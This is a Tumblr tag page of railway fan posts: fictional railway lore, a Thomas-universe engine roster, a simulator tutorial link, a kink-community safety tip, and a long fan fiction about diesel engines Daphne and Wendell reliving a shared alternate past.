#br class 101
Explore tagged Tumblr posts
greateasternj69 · 4 months ago
Text
Tumblr media
Sorry for taking so long to get a new upload out, been busy with IRL stuff over the last month. But I have some art in the works so there is stuff on the way, and some of them are not an illustration for Tales of the Tarmingham Overhead this time. But it is a stand alone drawing relating to Tarmingham, featuring one of the locations on the Overhead and is right in the centre of Tarmingham.
Here we see Danwood and Sanworth pulling into Tarmingham City Centre Station during the rush hour on a warm summers day in 2021 (the reason I choose to set the image around 2021 and not 24 is because I have a piece of lore about a war that starts in 22 that happens in the 29A timeline, and it has something to do with an AI Sentient Machine army. I'll be doing more lore relating to this event, and this war at a later date and when I release the official 29A timeline) while on their usual service to seaside town of Searonby. Tarmingham City Centre is as it's name implies is located in the centre of the city of Tarmingham serving it's main financial and shopping district and is a major interchange and junction on the Overhead with both the line to Ronston Quarter another major junction with lines from there branching off to Walaceton, Searonby, Greenham, and the south city line to band the line to Blburgh Oakland, and the station is where the western city line to Slaidon Marsh begins and is a starting point for the newest line on the Overhead the city circle line, and consists of four platforms.
Opening with the first section of the Overhead in 1864 as part of the line to Walaceton, albeit without delay after an incident that occurred at the station that became the railways first major accident, when a supplies train was driven by a bunch of rioting protesters from the southern part of the city at full speed off the end of the then under construction station with the engines boiler exploding upon impact with the ground, destroying and damaging several nearby buildings in the process with the engines boiler being sent flying thousands of feet into the air and landing inside the hull of a merchant freighter. The station opening as part of the section between GER's terminus at Tarmingham Piccadilly Street and the GE&SEJR's terminus at Ruston Quarter as part of the Overheads efforts to provide easy access to the docks and to allow the overhead to expand further to Walaceton. The station became a major junction for the Slaidon Marsh line after that lines opening in 1876 which allowed passengers to exchange between trains running on that line and the Walaceton line.
Since it's opening the station has gone through at least two redevelopments throughout it's life, with the first from 1971-1974 and the second from 2010-2015, with the bridge it was built on and the stairs leading up to the platforms being the renovated but others the only elements of the original station to remain standing, with the station being the busiest station the Overhead's network and the busiest in Tarmingham with it continuing to fill it's role as the city centres most important public transport hub with the station having since received a third line to serve that being the Circle line which opened in 2017.
Universe 29A and Characters: © GreatEasternJ69
8 notes · View notes
unreadpoppy · 2 years ago
Text
I think one of the worst experiences I went through everytime I´ve visited the USA is when someone is talking to us (my family) in english, but someone doesn´t understand it, we try to explain it in portuguese and these fucking usamericans will listen to it and START SPEAKING IN SPANISH and I´m like ma´am/sir, shut up you´re making it worst.
1 note · View note
trainalt22 · 5 months ago
Text
NWR engine roster 1-12 (plus D1-D3)
Tumblr media
NWR #1 Glynn (former)
Class: T.K&E.R A0 0-4-0 coffeepot
Service: 1915-1925 Farrqahur branchline passenger and light freight work.
1989-current on display at New Ulfstead Castle
NWR #1 Thomas
Class: N.W.R E2x 0-6-0T
Service:1950-1952 Tidmouth station pilot
1955-current Farrqahur branchline main passenger engine
NWR #2 Evelyn Edward
Class: Barrow-In-Furness K2 (modified)
Service: 1915-1922 NWR Main express engine 1923-1939 slow goods 1939-1945 Troop transport to the front lines 1950- current main engine for the Welsworth and Brendam branchline
NWR #3 Henry
Class: Gresliey Pacific prototype (flawed plans)1921-1954 LMS Stannier black 5 (reforged) 1957-current
NWR #4 Gordon
Class: LNER A1 prototype (modified)
Service: 1922-1939 Main express engine 1939-1945 wounded troop transport 1946-current main express engine
NWR #5 James
Class: L&YR Class 28 (modified)
Service: 1925-1950 Farrqahur branchline passenger engine and odd jobs 1955-current mainline duties and odd jobs
NWR #6 Percival (Percy)
Class: Unknown/contractor built
Service: 1955-1960 Tidmouth pilot 1960-current Farrqahur goods engine
NWR #7 Tobias (Toby)
Class: C53/J70 steam tram
Service: 1956-current mix traffic work on the Farrqahur branchline
N.W.R #8 Montague (Duck)
Class: G.W.R 5700 Pannier
Service: 1955-1965 Tidmouth pilot 1965-current mixed-traffic work on the little western (Tidmouth to Harwick branchline)
N.W.R #9&10 Donald & Douglas
Class Caledonian 612s
Service: 1960-current Mainline goods engines
NWR #D1 Boco
Class: BR Class 28
Service:1962-current Mainline mixed traffic
NWR #D2 Diesel Neil
Class:BR 08 1956-1962 BR Class 09 (modified) 1962-current
Service: 1960-current Tidmouth station pilot and occasional odd jobs
NWR #11 Oliver
Class: G.W.R 1400
Service:1963-current mixed traffic on the Harwick to Tidmouth branch
NWR #12 Emily
Class: N.W.R Stirling Single
Service::1965-current Mainline passenger work and odd jobs
NWR #D3 Daisy
Class: BR 101
Service: 1965-current passenger work on the Ffarquhar branchline
18 notes · View notes
dalihdgaming · 3 months ago
Video
youtube
BR101 Expert for TSW 4 | Pt. 3 - Cab-Car Expert Guide with Raph
This guide/tutorial is part of a multi-part series where we're joined with one of the authors & friend (Raph) of the BR101 & Cab-Car Expert Mode Manual who helps explain everything in great detail about the very intricate BR Class 101 and Cab-Car coming to Steam for Train Sim World 4. Enjoy!
You can download or view the BR101 & Cab-Car Expert Mode Manual.pdf here: https://drive.google.com/file/d/1cDE1LMicu64F0eTnPssZz3W6eWKmZHc3/view
#tsw4 #br101expert #jimmydali #dbbr101 #dovetailgames #trainsimworld4 #trainsimworld #simulator #simulation
0 notes
shamelesslymkp · 1 year ago
Text
Fetlife can be a little overwhelming, but it's really the best way I know of to find local groups and events - it's going to depend a lot on your location, what's easily accessible, but there are even a lot of virtual kink seminars these days!
If you're American and in the DC area, I highly recommend checking out the Crucible (local dungeon; good rep; lots of different events) and the Black Rose society (local kink educational group). Once a month, the DC rope group tends to have a workshop of some kind at the club; BR has weekly classes and hosts the monthly Dungeon 101 night.
Look for groups and events with clearly written and explicit policies of conduct, consent, and complaint. Look for people who ask for explicit consent even for non-sexual non-kinky things - ex: 'do you do hugs?'
The kink community (both brickspace and online) has its unfair share of predators and assholes both, but there's also so many good people trying to build each other someplace to call home.
Tumblr media
Fetlife is the most reliable and consistent online community I've found. I'd recommend talking to close friends and seeing if anyone you trust already has a foot in the door, or finding a local group gathering and speaking to the organizer about dropping in to test the waters or to find upcoming classes.
Large groups are usually safest, especially if they keep an established list of "Not Welcome" folks (showing that they're invested in safety and consent and willing to self-govern on what is and is not acceptable).
Munches, outings, and small parties are good places to start off getting to know people without diving head first into the deep end, and there should be no unspoken expectation of nudity, touching, or sexual activity.
I personally don't like sex or being touched by people, and what I know is mostly from work, but I've received a lot of great advice and have never been made to feel freakish or unwelcome.
Really, just a lot of super kind and welcoming folks.
All said, though, I'm a relative newbie- community elders are welcomed and encouraged to add on.
282 notes · View notes
joezworld · 4 years ago
Text
Memories
A continuation of this
January 29, 2020
“Well, despite my extensive protestations, I cannot find any reason whatsoever to keep you here.” Anton, the head of the Crovan’s Gate diesel shop, said as he shut his toolbox with a petulant clang.
55 010 and Wendell looked at each other with no small amount of relief. Since the events of Christmas, the works had been beside themselves in trying to find a cause of 010′s existence as well as fixing the damage to Wendell’s chassis from when he fell off the jack stands on Christmas day.
A naturally superstitious man, Anton had refused to clear 010 for traffic until he went over her with a fine-toothed comb. This was a process that had taken over a month, and had insulted Wendell more than it had 010, as the Class 47 had believed that Anton was looking for a way to keep 010 out of traffic (he was), while the Deltic - who hadn’t been properly serviced since the late 1970′s - found the whole process very therapeutic.
All that being said, the pair were anxious to get out of the sheds and onto the main line once again - Wendell wanted to stretch his wheels properly, while 010 was deeply excited to see the bright future of the year 2020.
Anton left, shutting off the lights behind him. The two engines would have kept talking, but they’d honestly exhausted their conversational reserves after being together for over a month, so instead they fell asleep, dreaming of the world outside the sheds...
---------------------------------------------------------------------------------
December 26, 1981
Doncaster Station, Doncaster, South Yorkshire, England
55 010 sleepily opened one eye to the sounds of an argument. Some men were clustered around the Class 47 that was on the siding. They sounded like they were trying to figure out what to do with her.
One group was saying that she should be shoved onto the out of use lines, while the others were saying that doing that would take too long. The 47 seemed to be stuck in the middle, unsure of which side to take. At one point, he opened his mouth to agree with the shunting plan, before he stopped. A flurry of emotions passed across his face in an instant, before he shut his mouth, glared at the men he’d been about to agree with, and put his wheel down.
“I’m not going to miss my path and spend all day in passing loops just to put her away - look at all the switches you’d have to hand throw! It’d take ages!”
With that the other men now held a majority, so without much more discussion the 47 was coupled up to her, and the train set off for parts unknown.
-
“Where are we going?” She’d sleepily asked the 47 - who’d introduced himself as number 556 - as they rattled across the Pennines.  
“Dunno,” He’d said quietly - they were coupled face-to-face, and she felt vaguely bad that he was driving backwards on her behalf. “Some coach depot I’ve never heard of - Titfield or Tidmouse or something like that.”
-
December 27, 1981
Tidmouth Station, Tidmouth, Tidmouth and South Haltraughshire, Sodor
47 556 and 55 010 eventually made it across the bridge and onto the Island very early on the morning of the 27th. It was a quiet little Island railway out here in the west country, and they met few trains on their way by.
A class 86 shouted hello from an electrified branch.
A old Hymek, somehow still in service, honked amiably as he passed with a goods train.
Even an old blue steam engine clattered by on a rail tour. This one looked at them funny, but the expected malice wasn’t there, merely confusion at the unusual double-header.
Eventually arriving at the big station at the end of the line, the two engines were met by a older gentleman in a top hat.
He introduced himself as the Controller for the region, and asked what they were doing here.
As 556 explained why he was also carrying a broken-down Deltic on his train, 010′s attention wandered to the rest of the station.
It was a beautiful design, like King's Cross, or Euston before they ruined it, but the roof of the trainshed was simply covered in soot - it was almost like they hadn’t cleaned it since before the end of steam.
Then there was a whistle from outside the platforms.
Both diesels goggled as a tender engine, painted an almost gaudy shade of bright blue with red lining, rolled into the station with a train of teak coaches.
At almost the same time, two more whistles were heard, and a train of GWR autocoaches complete with a Pannier Tank in the middle rattled in alongside a green saddle tank engine of indeterminate origin towing a pair of ancient compartment coaches.
“What is that?” 010 asked, shocked to see clean and well-maintained steam this far into the 1980s.
“Those are Gordon, Duck, and Percy.” Said the controller kindly.
“Are they all on rail tours?” Asked 556, causing the controller to laugh.
“No! They’re my engines! They work every day because they’re still useful.”
Neither diesel said anything. 556 was shocked that BR was allowing this to happen, but 010 suddenly felt a surge of hope. If they were still running steam here, maybe she could convince 556 to leave her here on his way home...
Something must have shown in her face - or maybe even 556′s, because the next thing the controller said was: “If I may, my railroad is currently experiencing a locomotive shortage. We have to keep relying on the other railway for temporary engines, but they aren’t the most reliable. Would either of you happen to know where I could find some strong, hardworking locomotives?”
-
They stabled 556 and 010 in the sheds with the steam engines over the New Year’s holiday. It was an almost out-of-body experience for 010, who was used to the cold and unfriendly atmosphere of Finsbury Park TMD, and had no idea how to deal with engines who, when told to treat her nicely, immediately made sure to include her in their singing of  Auld Lang Syne.
A few weeks later, both engines had been successfully outshopped at the massive works complex in the west of the island. 556 had required little repairs, but had rolled out with a new coat of paint and a new name, Wendell, chosen after a friendly dog that hung around the works.
It took longer for 010. She had many, many worn out parts that required removal and repair, and her engines needed a full overhaul. During this time period, some of the female welding staff had spoken to her about needing to choose a name before one was chosen for her - apparently the Hymek she’d seen was named Bear, and she didn’t want that did she?
After a few days with books on baby names, a set of brass nameplates were bolted to her sides - they read “DAPHNE” in big letters.
While she was there, the workmen asked her what she wanted to be painted. When her request for a new coat of Rail Blue was met with groans, the men explained that they were bored of normal paint schemes and would paint anything she wanted.
-
Two weeks later she rolled out of the works feeling like a new engine. Her motors fired on all cylinders, her grease and oil was fresh, and her new paint sparkled in the sun. She’d always liked how Deltic - The Deltic, DP1 - had looked, and the men had grinned at each other when she told them about how the irritable prototype had spent most of his free time whining about not having stripes that went the whole way down his body.
Daphne found out why when she rolled into Tidmouth Shed that night. There was another express diesel on this island - a big Class 46 - and the similarities were striking. Both had similar designs, and had non-standard paint - the 46 was red, she was blue - with gold stripes down their sides. The 46 was named Delta - a very similar sounding name, and when she opened her eyes and took in Daphne and her nameplates, it took her all of two seconds to begin smiling broadly.
“You look like you could be my big sister!” She said.
Daphne, expecting some sort of hostility, wasn’t sure how to respond. “Well, all of my sisters are dead, so it would be nice to have one again.”
She began to backpedal when the 46 stopped smiling, but the look she gave was thoughtful instead of hurt. “Come to think of it, all of mine are probably dead too. Shall we make our own family then?”
And so it was.
-
A few weeks later, Daphne and Wendell finally met all but one of the other diesels on the region - a Class 28 named BoCo, Bear the Hymek, and Daisy, a deeply customized Class 101. According to Daisy, there was also a Class 01 named Mavis who worked on a private quarry at the end of her branch line.
“You know,” Daisy said after Delta finished introducing everyone. “Aside from having one of each power rating, I think all of us but Wendell would have been scrapped by now if we were on the mainland. I think we should do something to celebrate the fact that we aren’t dead.”
The other diesels agreed - word had already spread about Delta and Daphne’s nontraditional sisterhood - and they agreed to form a club: the Non-Standard Survivors Society.
“But, I’m not non-standard?” Wendell asked as they dispersed. “Am I?”
“No, but you are really cute,” Delta joked. “So we’ll give you a pass.”
Daisy chuckled as she headed for the platform. “I’ll have to remember that when I tell Mavis about this club she’s in now.”
Daphne was confused. “Cute? What do you mean cute?”
Wendell was similarly puzzled.
Bear and Delta looked at each other meaningfully. “You two have so much to learn...” The type 3 said as he backed into the station.
That didn’t make Daphne or Wendell feel any better!
-
1983  
“You know,” Said Delta one morning in the newly-refurbished diesel shed. “We should have nicknames for the society.”
“My name is Bear,” Said Bear. “yours is a Greek letter. How much more nickname-y can we get?”
“The rest of us should get nicknames then. And I feel like I could get a great nickname, like Tiger Stripes!”
Daphne giggled as Bear growled under his breath. “And why, pray tell, are you Tiger Stripes?”
“Because I’m fierce like a tiger! And I have stripes like a tiger does! It also matches the animal theme we’re going with.” Either Delta could think at a mile a minute, or she had been considering these nicknames for a lot longer than she let on.
“A tiger does not have stripes like you do.”
“How do you know?”
“My name is Bear. I know about animals. I have to.”
“I figured it was so that we could be ‘Lions, Tigers, and Bears, oh my!’” Quipped Daphne. “I guess that makes me Lion Stripes then.”
Delta’s sputtering and spluttering made it very clear that she hadn’t thought of that, and Bear and Daphne roared with laughter.
-
Later that year
The Thin Clergyman’s son made another trip to Sodor to research for his next books.
Daphne, as an express engine, had been rather removed from the strife among the rank-and-file engines caused by the Thin Clergyman’s books, and had no idea why Delta wanted to hide from him.
After a “short” explanation that took almost an hour, Daphne was now furious.
While she did help Delta by hiding her deep inside an old carriage shed, she did not stay there herself; She was an engine of action, and would deal with the problem directly.
Two days later, the Clergyman’s Son approached her to ask her some questions.
“If my sister shows up in one of your books you won’t survive to write another.” She said darkly to the author, who retreated immediately! 
The Clergyman’s Son’s next book focused about Diesels and James. Much to everyone’s amusement, Delta was nowhere to be found in it, despite her being being the biggest reason why James was more accepting of diesels.
Unsurprisingly, Daphne did not appear either, and everyone wondered if the story of the rude diesel who crashed through a wall was based on her in some way. Delta, on the other wheel, stayed uncharacteristically silent!
Wendell was most offended that they hadn’t even bothered to include his name in the book, and refused to speak to the Clergyman’s Son again!
-
1985
Bear and Wendell had both gotten very scruffy looking after several years without a repaint, and went into the works with the intent of coming out looking the same as they had before.
They had reckoned without Delta and Daphne, who had very kindly asked the paint shop workers to be imaginative on their friends.
Bear had rolled out first, looking furious about the deception, but rather pleased with his paint. The men had been inspired by some American locomotives, and he rolled out of the shop in a dark shade of green with metallic gold stripes down his sides.  Any lingering discontent he had felt lasted until Henry saw him for the first time and dragged him away behind a shed without a word. Daphne tried to ask what was going on, but Delta, laughing too hard to even speak, had pulled her away to the station.
Wendell came out a few days later. Whatever the men had originally tried hadn’t been to his liking, he explained, and he’d asked them to try a different design from the same book that they’d pulled Bear’s paint scheme from. When he came into the sheds painted a glossy black with grey and white stripes, Daphne felt both of her crankshafts do a flip-flop.
Delta took one look at the slack jawed expression on her adopted sister’s face and sighed deeply. How had Jamie seen this coming before she did?
It took all of a week for Bear and Wendell to have nicknames foisted on them by the express sisters - Ursus and Cobra stripes, respectively. Delta explained that she liked the predatory animal theme that went with Lion and Tiger, while Daphne innocently pointed out that it had absolutely nothing to do with how much it annoyed Bear.
The nicknames did eventually stick though, in no small part because Henry had taken one look at how irritated Bear was and started calling him Ursus!
It took a month after that for Tiger Stripes to take pity on her sister and the piteous faces she made when she thought Wendell wasn’t looking, pulled a Flying Scotsman, and told her and Cobra Stripes exactly what those feelings meant. She was very unsurprised when Wendell revealed that he was also growing attracted to Daphne.
Henry and James both joked that one day, Bear or Delta would put one of them through a wall, but three weeks later, Daphne managed to put herself and Wendell into the parking lot behind Barrow Sheds.
-
1990
After realizing that Mavis and Daisy both technically had stripes painted on them (making them Wasp and Cougar stripes), the other diesels began to seriously peer pressure BoCo into getting repainted with stripes so they could complete the set.
He’d held out for many years, but after Daphne took a special train to the clay pits, there was suddenly pressure from within the Brendam Branch as well, and he folded like a house of cards in less than a week.
When he came back from the works, he was now green, gold, and white, but also red, if you counted the angry blush on his face.
“I asked them for Southern Railway Green with a gold stripe.” He seethed. “But clearly there was a misunderstanding.”
The howling from his compatriots was earthshakingly unsympathetic, but nobody could deny that he looked striking, and he was quickly dubbed Jaguar Stripes, even though - as he and Bear were quick to note - he did not look like a Jaguar at all.
-
1995
James asked Delta to marry him. The other engines were overjoyed, even if they BoCo and Daisy needed some catching up on how exactly that was possible.
Daisy groaned. “Mavis and I are going to have to have a talk, aren’t we?”
The other diesels - which by this point included James and Henry in an honorary capacity - hadn’t quite processed that when BoCo announced that if he was being honest, he and Edward were “so emotionally codependent that we’ve probably been married for twenty years without realizing it.”
Henry couldn’t take it any more and screeched with laughter at the conversational disparities - he’d just left the steam sheds, where the engines were still unaware that London had multiple termini, and were therefore having a rousing argument as to whether the impending fall of British Rail meant that London’s terminus station would magically return to being King’s Cross or Paddington instead of the current Euston.
-
1996
James and Delta were wed in a quiet ceremony behind the diesel shed - Siobhan, her fiancé Declan, and all the members of the “Non Standard Society” - including Mavis, who traveled down specially for the event - were present, with Daphne and Henry acting as bridesmaid and best man.
By design, the engines had arrived in pairs, with only BoCo “going stag”, as he hadn’t yet told Edward how he felt. The officiant - a kind looking man from the Arlesburgh judiciary - had taken one look at the rest of them and asked if he should be preparing for any other weddings in the near future. Daphne and Wendell were the only ones to say yes instinctively. (Much to each other’s surprise!) When Daphne looked over at Bear and Henry, they said with no small amount of irritation that it wasn’t legal yet for them to be wed. Similar grumblings then erupted from Mavis and Daisy, which briefly made the quiet ceremony very loud, as none of the other engines had been aware that either diesel was dating!
-
2000
Dull yellow smoke billowed out of Percy’s funnel as the men did a pressure test. Before Daphne or Wendell could do anything, they were enveloped by the choking cloud. 
Daphne shut her eyes to avoid getting any of the strange metallic soot in her eyes, and when she opened them again, the works looked... different somehow. 
A few of the new inspection pits were gone, while the diesel shop building had one less door than it should. 
Daphne opened her mouth to ask Wendell what was going on, and then stopped dead in her tracks when a workman ran right through her. 
Looking down at herself, she appeared to be fully transparent, floating above the rails like a ghost of Deltics past. 
“Who are you?!” Wendell squeaked. 
Daphne looked at him for a moment. His paint was a different colour than it had been a minute ago - Rail Blue instead of Black and Gray - and he seemed like he didn’t remember her at all. 
“Cobra,” She said, not even thinking that this was not the time for nicknames. “It’s me, Lion. You know me.”
“I know exactly who you are.” He said frantically. “You’re the ghost of the engine I killed! It��s not Christmas! Begone with you!”
“What?!” Daphne was horrified. “Wendell, what on Earth are you talking about!? Nobody’s dead! How can you say that?!”
“Don’t you overreact here Lion!” Wendell snapped. “I should be the one screaming! Ignoring whatever it is you are, there are dinosaurs eating the ballast! That water tower has a face!”
Daphne suddenly understood that there was something in the yellow smoke that was making both of them see things that weren’t there. With that in mind, she spent most of the next few hours keeping Wendell calm until the hallucinations stopped, and he turned back into the black and gray diesel she’d fallen in love with.  
A few weeks later, and Daphne asked Wendell about what he saw in the yellow smoke. 
“I saw a bunch of brightly coloured horses singing about friendship. Why?”
“Just curious...” Daphne said as she realized that maybe her hallucinations had been much stronger than she thought!
-
Later That Same Year
A new high speed trainset arrived on Sodor. Their names were Pip and Emma.
They had been on the island once before in the early 80′s, but somehow none of the diesels had met them in anything other than passing.
After three nights on Sodor, Delta declared that she liked them and was “keeping them”, giving them no choice in the matter on the subject of express engine sisterhood. Daphne explained that Delta was less of an engine and more of a force of nature, to which Emma responded that she and Pip were ‘the Dragon Sisters’ and could take care of themselves.
Both Dragons realized that they had even less of a choice when Daphne's face lit up like a Christmas tree upon hearing that!
Learning that the duo already had animal-themed nicknames for themselves made it much easier for Lion and Tiger Stripes to press-gang their new sisters into the “Non-Standard Survivors Society”, and even easier to get them painted into the old Intercity “Swallow�� paint scheme.
Even for express locomotives, the speed at which the two went from Pip and Emma to Dragon Stripes was remarkable.
-
Even later that same year
Donald screamed all the way to the Little Western, unable to shake the image of a unified force of Red Eyed, Soul Stealing, Mind Controlling, Memory Altering, Diesel Electric Monsters!
-
2001
Pip and Emma taught the other diesels how to breathe fire.
Being the sort of sisters that they were, Daphne, Emma, Pip, and Delta soon began hosting competitions to see who could shoot fire the furthest. This did not help Oliver’s mental state at all.
-
2004
The United Kingdom allowed same-sex couples to enter into a “civil union” on the 14th of March. The engines knew it wasn’t actual marriage, but it was more than they’d been allowed before, and Daisy and Mavis, and Henry and Bear were wed by The Magistrate that night, with Delta and James acting as best man and bride/groomsmaid in all the ceremonies.
Immediately afterwards, Daphne and Wendell - who had agreed not to be wed until their friends could - tied the knot as well.
The rest of the Society (BoCo, Pip, Emma) and Siobhan and her husband Declan cheered until they were hoarse.
The next morning, Stephen and Richard Hatt, as well as most of the steam engines, could not understand how every James, Henry, and every diesel on the island were somehow exhausted and happy at the same time.
-
Later that same year
Flying Scotsman showed up on what would turn out to be his last railtour before his overhaul. Not realizing what he’d started way back in 1979, he jokingly asked if Henry and Bear had ever done anything in regards to their relationship.
When they and seemingly every other diesel on the Island regaled him with wedding stories he almost burst a boiler tube!
-
2007
Pip managed to convince the paint shop staff to paint huge fire breathing dragons on herself and Emma for Christmas.
Within two weeks all the other diesels had their own respective animals painted somewhere on their bodies.
After a while, they all started to notice that the animals seemed to be in different places on different days... Daphne's Lion and Wendell's Cobra would even swap locomotives sometimes - not that they'd ever admit it!
After an even longer while they noticed that an identical Bear and Tiger had ended up on Henry and James - despite neither of them having gone near the paint shop in months!
Richard Hatt has asked why this happened, but nobody has yet said anything close to the truth. It may be because they don’t know themselves...
-
2017
A certain Class 5 diesel convinced her driver to hang some mistletoe over the turntable.
Everything was going well until Donald chuffed in unexpectedly and saw Henry and Bear under it.
A lot of explaining was required.
-
2020
Wendell loved Christmas, and had spent every year since the early 90′s covered in lights and pulling the N.W.R.’s holiday train. In more recent years Daphne also joined him, and they usually spent a few days in the first or second week of January getting the lights removed and their paint touched up.
This year, heavy traffic in early January meant that they couldn’t make it to the works until late on the 28th, and spent all of the next day getting de-lighted and touched up. They went to sleep eager to go to work the next morning...
-------------------------------------------------------------------
January 30, 2020
Wendell woke up with a start. What a dream that was! It felt so realistic, and...
55 010 was staring at him, eyes wide to the point of bulging out of her face.
“What?” He asked, trying to shake off the feeling of strangeness - in his dream, they were married, but engines can’t get married - can they?
“Wendell,” She said quietly, her voice shaking. “I just had the most amazing dream.”
“Really?” Maybe they could compare notes, Wendell wondered. Maybe in her dream they were all brightly coloured crime fighting action heroes.
“We were married.” She said after a moment.
Wendell felt the world go fuzzy around him. The last thirty-nine years of his life flashed before his eyes in some sort of visual stereo - one side sad and depressed, the other side...
“Daphne?!” He gasped as he returned to reality.
That was all the confirmation the big Deltic needed. “It wasn’t a dream!” She cried joyously.
“It was,” Wendell said, his brows furrowing under a sudden and massive headache. “But it wasn’t. How can it be both?”
“I don’t know and I don’t care.” Daphne/55 010 said, her voice laced with quiet joy. “I have sisters. I have a family. I have you.”
Wendell could feel his mind short circuiting. On one wheel, he was in his shed in the works. It was his home. He’d lived here since the 80′s!
On the other... He lived at the diesel shed in Tidmouth. He’d asked The Fat Controller in 1982 if he could stay there so he could be with his friends - with Daphne. His home was the road between Daphne and Bear in Tidmouth.
Bear. His eyes widened as he thought of the Hymek.
He didn’t know the diesel that well, but - he did. Did he? Was this all a shared dream between him and 010, or was Bear really Henry’s husband? Were Delta and James married? What about Daisy and Mavis? Was 010 actually Daphne? He didn’t know what was real or not anymore.
He looked back at Daphne/010. As much as he wanted to believe it was true - that he really did have thirty years of family and love - but as he looked over at the Deltic and down at his own buffers, he didn’t see the blue-and-gold or black-and-gray of Lion and Cobra Stripes, just the basic Rail Blue of two anonymous British Diesels.
Then...
As he looked at 010/Daphne, her dark blue paint started to muddy and shift before his eyes. Starting at her buffers and moving backwards, a ripple of colour began to work its way across her body. The rail blue and yellow warning panels faded away, leaving a trail of sky blue paint and metallic gold stripes. A roaring lion, standing atop a crushed double arrow, appeared below her cab window.
He would have watched the transformation in more detail, but a sudden and intense itching caused his him to look down at his own body. Where there had previously been blue and yellow was now a dark gloss black with grey stripes. The very hint of a snake's tail could be seen stretching around the corner of his bodywork.
It was over almost as quickly as it begun, and when the two diesels looked back up at each other, they didn’t see Wendell and 55 010, they saw:
“Lion?”
“Cobra?”
---
The drivers who went to take Wendell and 010 back to the works had no idea why the diesels were crying like babies, but assumed it was due to the outrageous paint schemes the works had elected to cover them in. They were in no mood for shenanigans, and coupled up the engines and left before the works staff could notice and ask questions.  
In a remarkable parallel to the 1981 of their dreams, Wendell hauled an unpowered Daphne and a rake of coaches from the works down to Tidmouth in the predawn light of winter. They passed Abbey, who shouted hello from the electric branch, and passed Edward, who stared at their paint in utter bafflement.
The train arrived in Tidmouth, but there was no Fat Controller to meet them that day, so they left the coaches at the platform for The Limited and departed for the diesel shed.
Wendell felt another headache come on as he rolled up to the concrete-and-steel structure. With only Bear and Delta permanently in Tidmouth, The Fat Controller hadn’t built the shed until Pip and Emma arrived in 2000, knocking down an old brick warehouse to do so.
But, with Daphne and Wendell, that old brick building had been spruced up and expanded in the 80′s. Looking at the building, Wendell felt woozy as his mind layered an image of the cozy warehouse overtop of the sleek shed.
“There’s supposed to be windows there.” Daphne whispered as she looked at the blank wall of the shed.  
Wendell grimaced as he looked up. That blank concrete wall was in no way special, but at the same time, the light that streamed in through bank of windows set into the brick had been the source of many arguments - nobody wanted to be the one in that road because the morning sun was at just the right angle to shine into the eyes of whoever was parked under them.
But that wall was blank specifically because the architects had realized that - in 1999.
But it was an old shed - from the 1920's, right?
Wendell grimaced and hoped that his mind would pick something and stick to it.
Arriving in the shed to the sound of Genesis drifting through the doors - dream or no dream, Henry had apparently still infected them with his prog rock obsession - the men first shunted Daphne onto one road before putting Wendell next to her,  powering off off his motor and scarpering to the staff canteen and its coffee maker, leaving the two diesels outside.
Their presence was noticed after Bear’s voice drifted out of the shed with a command to turn off the voice activated speaker. In the silence, the quiet pinging of Wendell’s cooling engine was heard, drawing eyes to the outside.
“What the hell are you painted like that for?” Called BoCo from inside the sheds. “And who are you?” He asked Daphne.
“Hi Jaguar, it’s so good to see you.” Daphne evidently did not care that BoCo had no idea who she was.
“Good morning!” Said Wendell, trying to figure out how on earth he was going to explain this. “We had a doozy of a dream last night!”
The other diesels poked out of the doors to gawp at the oddly-painted engines.
Delta in particular looked like she wanted to say something, looking down at her own stripes before looking at Daphne’s.
“You look like you could be my big... sister...” She didn’t make it all the way through her sentence before her jaw dropped and her eyes glazed over. Wendell imagined that this is what he looked like earlier that morning.
“You...” Delta was on the verge of tears. “You were at my wedding. You all were!”
“Your what? You know this engine?” BoCo was more confused than ever.
“Yes! And so do you! We all do!”
“Delta, I have never... met...” BoCo stared in shock after his eyes glazed over for a long moment. “Oh soot and oil... Daphne?!”
And so it went through the other engines, who all suddenly remembered.
“How?!” Bear eventually managed. “How did this - what?”
He was cut off as his paint rippled and changed, an effect that quickly rolled across the other engines. From within the shed, Emma and Pip swore loudly as their NWExpress livery roiled and shifted from blue and yellow to black, white and red. BoCo grimaced as his BR green suddenly became a lot more American. Bear grinned unconsciously, suddenly remembering how well Henry had taken his stripes last time.
Within a few minutes, the disparate group of diesels were gone, replaced with the members of the Non-Standard Survivors Society.
Daphne, who watching this happen with no small amount of glee, squealed with happiness.
-
In the station, Henry and Daisy were congratulating Richard Hatt on his recent promotion to assistant controller of the railway. As they spoke, both engines kept one eye on the diesel shed in the distance - two new diesels in some absolutely ludicrous paint schemes were parked in front of the diesel shed, and a commotion was quietly audible, much to their consternation.
Richard eventually took notice of the new engines as well, and took a long moment to try and figure out why the original Deltic prototype was on his railway. A gasp drew him back to the engines on the platform, both of whom now looked like they’d seen a ghost.
“Are you all right?” he asked with concern.
Daisy, who was wide eyed and shaking on her suspension, was the first to react. “I’m married!” She shrieked before setting off for the junction almost before her signal dropped. Richard wasn’t sure, but as Daisy left, frantically blowing her horn to the diesels in the yard as she did so, she seemed to shimmer in the sun for a moment.
“What?” Richard asked. He thought he’d heard what Daisy had said, but was really hoping that he’d misheard her. He looked back at Henry, suddenly forced to remember that he had to give the engine a day off every March.
“I don’t think I could explain that to you if I had all day.” Henry said quietly.
Richard wanted to investigate the sudden faraway look in the engine’s eyes, but remembered what usually happened to him when he asked the engines personal questions.
As he left the platform, he noted with some amount of confusion the elegantly-painted bear that was on Henry’s cab side. It definitely hadn’t been there when he walked up.
He turned around to ask Henry about it, when James raced into the station, a wild look in his eyes.
“Henry!” He demanded. “What just happened to me?!” The pouncing Tiger painted on the side of his tender gave some idea as to the “what” he was talking about.
Richard turned and fled for his office. The pub didn’t open until noon, and he was not about to deal with any new earthshattering revelations sober.
32 notes · View notes
feigeroman · 4 years ago
Text
Thomas Headcanons: Daisy
Tumblr media
While Daisy was built specifically for NWR service (and is one of the few engines to have this distinction), it was purely by chance that she arrived in time to take over for Thomas after his famous incursion into the stationmaster’s house. She’d actually been on the cards long before this accident, and it was pure coincidence that it should happen the day before she arrived.
BR had actually been pestering Sir Topham Hatt to give one of their DMUs a try since 1955, but he’d constantly turned down their offers - especially after Devious Diesel’s trial in 1957 had left a sore taste in his mouth on the subject of diesels. By 1960, however, passenger numbers on the Ffarquhar branch had increased to the point of becoming too much for Thomas to handle alone. Sir Topham Hatt was forced to give in, and told BR that if they were to provide a DMU, he would trial it and give them his thoughts.
Daisy was actually a special one-off job, built as a prototype for a potential single-car version of the Class 101. Although this did not go into full production, the lessons learned from Daisy’s construction were applied to later classes of single-car units.
Daisy’s trial period was intended to be only two weeks, but this was extended to a full month after Thomas’ accident, as that was how long his repairs took.
